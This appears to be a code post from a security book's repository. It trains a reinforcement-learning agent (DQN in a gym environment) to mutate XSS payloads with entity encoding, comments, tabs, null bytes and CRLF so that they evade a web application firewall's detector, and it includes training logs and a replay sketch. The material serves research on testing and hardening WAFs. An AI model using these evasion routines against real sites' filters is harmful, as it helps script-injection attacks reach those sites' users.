Reference: https://github.com/duoergun0729/3book/tree/master/code/gym-waf
Code:
wafEnv.py
# -*- coding: utf-8 -*-
import numpy as np
import re
import random
from gym import spaces
import gym
from sklearn.model_selection import train_test_split

#samples_file = "xss-samples.txt"
samples_file = "xss-samples-all.txt"
samples = []
with open(samples_file) as f:
    for line in f:
        line = line.strip('\n')
        print("Add xss sample:" + line)
        samples.append(line)

# Split into training and test sets
samples_train, samples_test = train_test_split(samples, test_size=0.4)


class Xss_Manipulator(object):
    def __init__(self):
        self.dim = 0
        self.name = ""

    # Common evasion actions:
    #   Convert a random character to its hex entity, e.g. a -> &#x61;
    #   Convert a random character to its decimal entity, e.g. a -> &#97;
    #   Convert a random character to its decimal entity padded with zeros, e.g. a -> &#00000097;
    #   Insert a comment, e.g. /*abcde*/
    #   Insert a Tab
    #   Insert a carriage return
    #   Insert whitespace at the start, e.g. /**/
    #   Mix upper and lower case
    #   Insert \00, which browsers also ignore
    ACTION_TABLE = {
        #'charTo16': 'charTo16',
        #'charTo10': 'charTo10',
        #'charTo10Zero': 'charTo10Zero',
        'addComment': 'addComment',
        'addTab': 'addTab',
        'addZero': 'addZero',
        'addEnter': 'addEnter',
    }

    def charTo16(self, str, seed=None):
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            # Pick a character to replace
            modify_char = random.choice(matchObjs)
            # HTML hex entity of the character, e.g. a -> &#x61;
            modify_char_16 = "&#x{:x};".format(ord(modify_char))
            # Replace a few occurrences
            str = re.sub(modify_char, modify_char_16, str, count=random.randint(1, 3))
        return str

    def charTo10(self, str, seed=None):
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            modify_char = random.choice(matchObjs)
            # HTML decimal entity of the character, e.g. a -> &#97;
            modify_char_10 = "&#{};".format(ord(modify_char))
            str = re.sub(modify_char, modify_char_10, str)
        return str

    def charTo10Zero(self, str, seed=None):
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            modify_char = random.choice(matchObjs)
            # Decimal entity padded with zeros, e.g. a -> &#00000097;
            modify_char_10 = "&#000000{};".format(ord(modify_char))
            str = re.sub(modify_char, modify_char_10, str)
        return str

    def addComment(self, str, seed=None):
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            # Pick the character to replace
            modify_char = random.choice(matchObjs)
            # Append an inline comment after it
            #modify_char_comment = "{}/*a{}*/".format(modify_char, modify_char)
            modify_char_comment = "{}/*8888*/".format(modify_char)
            str = re.sub(modify_char, modify_char_comment, str)
        return str

    def addTab(self, str, seed=None):
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            modify_char = random.choice(matchObjs)
            # Prepend a Tab
            modify_char_tab = "\t{}".format(modify_char)
            str = re.sub(modify_char, modify_char_tab, str)
        return str

    def addZero(self, str, seed=None):
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            modify_char = random.choice(matchObjs)
            # Prepend \00
            modify_char_zero = "\\00{}".format(modify_char)
            str = re.sub(modify_char, modify_char_zero, str)
        return str

    def addEnter(self, str, seed=None):
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            modify_char = random.choice(matchObjs)
            # Prepend \r\n
            modify_char_enter = "\\r\\n{}".format(modify_char)
            str = re.sub(modify_char, modify_char_enter, str)
        return str

    def modify(self, str, _action, seed=6):
        print("Do action :%s" % _action)
        action_func = getattr(self, _action)
        return action_func(str, seed)


ACTION_LOOKUP = {i: act for i, act in enumerate(Xss_Manipulator.ACTION_TABLE.keys())}
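To see what a single evasion action does, the sketch below applies one mutation to a hand-written payload. The payload and the direct import of wafEnv are illustrative assumptions (importing the module also loads the sample file at module level, so xss-samples-all.txt must exist):

# Minimal usage sketch; the payload is a made-up example
from wafEnv import Xss_Manipulator, ACTION_LOOKUP

m = Xss_Manipulator()
payload = "<script>alert(1)</script>"
# Apply action 0, e.g. 'addComment': a random character in [a-qA-Q] gets an
# inline /*8888*/ comment appended after every occurrence
mutated = m.modify(payload, ACTION_LOOKUP[0])
print(mutated)  # e.g. <sc/*8888*/ript>alert(1)</sc/*8888*/ript>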
Main code:
# -*- coding: utf-8 -*-
import gym
import time
import random
import gym_waf.envs.wafEnv
import pickle
import numpy as np

from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, ELU, Dropout, BatchNormalization
from keras.optimizers import Adam, SGD, RMSprop
from rl.agents.dqn import DQNAgent
from rl.agents.sarsa import SarsaAgent
from rl.policy import EpsGreedyQPolicy
from rl.memory import SequentialMemory

from gym_waf.envs.wafEnv import samples_test, samples_train
# from gym_waf.envs.features import Features
from gym_waf.envs.waf import Waf_Check
from gym_waf.envs.xss_manipulator import Xss_Manipulator

from keras.callbacks import TensorBoard

ENV_NAME = 'Waf-v0'

# Maximum number of mutation attempts per sample
nb_max_episode_steps_train = 50
nb_max_episode_steps_test = 3

ACTION_LOOKUP = {i: act for i, act in enumerate(Xss_Manipulator.ACTION_TABLE.keys())}


class Features(object):
    def __init__(self):
        self.dim = 0
        self.name = ""
        self.dtype = np.float32

    def byte_histogram(self, str):
        # Byte values of the payload
        bytes = [ord(ch) for ch in list(str)]
        h = np.bincount(bytes, minlength=256)
        return np.concatenate([
            [h.sum()],                                 # total size of the byte stream
            h.astype(self.dtype).flatten() / h.sum(),  # normalized histogram
        ])

    def extract(self, str):
        featurevectors = [
            [self.byte_histogram(str)]
        ]
        return np.concatenate(featurevectors)


def generate_dense_model(input_shape, layers, nb_actions):
    model = Sequential()
    model.add(Flatten(input_shape=input_shape))
    model.add(Dropout(0.1))
    for layer in layers:
        model.add(Dense(layer))
        model.add(BatchNormalization())
        model.add(ELU(alpha=1.0))
    model.add(Dense(nb_actions))
    model.add(Activation('linear'))
    print(model.summary())
    return model


def train_dqn_model(layers, rounds=10000):
    env = gym.make(ENV_NAME)
    env.seed(1)
    nb_actions = env.action_space.n
    window_length = 1

    print("nb_actions:")
    print(nb_actions)
    print("env.observation_space.shape:")
    print(env.observation_space.shape)

    model = generate_dense_model((window_length,) + env.observation_space.shape, layers, nb_actions)
    policy = EpsGreedyQPolicy()
    memory = SequentialMemory(limit=256, ignore_episode_boundaries=False, window_length=window_length)
    agent = DQNAgent(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup=16,
                     enable_double_dqn=True, enable_dueling_network=True, dueling_type='avg',
                     target_model_update=1e-2, policy=policy, batch_size=16)
    agent.compile(RMSprop(lr=1e-3), metrics=['mae'])

    #tb_cb = TensorBoard(log_dir='/tmp/log', write_images=1, histogram_freq=1)
    #cbks = [tb_cb]

    # play the game. learn something!
    # nb_max_episode_steps is the maximum number of steps per episode
    agent.fit(env, nb_steps=rounds, nb_max_episode_steps=nb_max_episode_steps_train,
              visualize=False, verbose=2)

    #print("#################Start Test################")
    #agent.test(env, nb_episodes=100)

    test_samples = samples_test
    features_extra = Features()
    waf_checker = Waf_Check()
    # Mutate the current sample according to the chosen action to evade detection
    xss_manipulatorer = Xss_Manipulator()

    success = 0
    sum = 0
    shp = (1,) + tuple(model.input_shape[1:])

    for sample in test_samples:
        sum += 1
        for _ in range(nb_max_episode_steps_test):
            if not waf_checker.check_xss(sample):
                success += 1
                print(sample)
                break
            f = features_extra.extract(sample).reshape(shp)
            act_values = model.predict(f)
            action = np.argmax(act_values[0])
            sample = xss_manipulatorer.modify(sample, ACTION_LOOKUP[action])

    print("Sum:{} Success:{}".format(sum, success))
    return agent, model


if __name__ == '__main__':
    agent1, model1 = train_dqn_model([5, 2], rounds=1000)
    model1.save('waf-v0.h5', overwrite=True)
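The observation the agent learns from is just the byte histogram built by Features: one total-length entry plus 256 normalized byte counts, i.e. a 257-dimensional vector, which is why the feature is reshaped to shp = (1, 1, 257) before model.predict. A quick sanity check, assuming the Features class defined above is in scope (the payload is a made-up example):

features = Features()  # Features as defined in the main code above
v = features.extract("<script>alert(1)</script>")  # hypothetical payload
print(v.shape)           # (1, 257): 1 length entry + 256 normalized histogram bins
print(v[0][0])           # 25.0 -> total number of characters in the payload
print(v[0][1:].sum())    # ~1.0 -> the histogram part sums to one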
Result:
reset current_sample=
Do action :addEnter
Do action :addComment
Good!!!!!!!avoid waf:
 987/1000: episode: 221, duration: 0.016s, episode steps: 2, steps per second: 122, episode reward: 10.000, mean reward: 5.000 [0.000, 10.000], mean action: 1.500 [0.000, 3.000], mean observation: 0.179 [0.000, 53.000], loss: 1.608465, mean_absolute_error: 3.369818, mean_q: 7.756353
reset current_sample=
Do action :addEnter
Do action :addEnter
Do action :addEnter
Do action :addZero
Do action :addEnter
Do action :addEnter
Do action :addEnter
Do action :addEnter
Do action :addEnter
Good!!!!!!!avoid waf:
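Since train_dqn_model saves the Q-network to waf-v0.h5, the evasion loop can also be replayed later without retraining. A minimal inference sketch, assuming it runs in the same script as the Features class, ACTION_LOOKUP table, and nb_max_episode_steps_test above (the payload is again a made-up example):

import numpy as np
from keras.models import load_model
from gym_waf.envs.waf import Waf_Check
from gym_waf.envs.xss_manipulator import Xss_Manipulator

model = load_model('waf-v0.h5')
features = Features()              # Features and ACTION_LOOKUP as defined above
waf_checker = Waf_Check()
manipulator = Xss_Manipulator()

sample = "<script>alert(1)</script>"        # hypothetical payload
shp = (1,) + tuple(model.input_shape[1:])
for _ in range(nb_max_episode_steps_test):  # same step budget as the test loop
    if not waf_checker.check_xss(sample):   # the WAF no longer flags the sample
        print("Evaded: " + sample)
        break
    q = model.predict(features.extract(sample).reshape(shp))
    sample = manipulator.modify(sample, ACTION_LOOKUP[int(np.argmax(q[0]))])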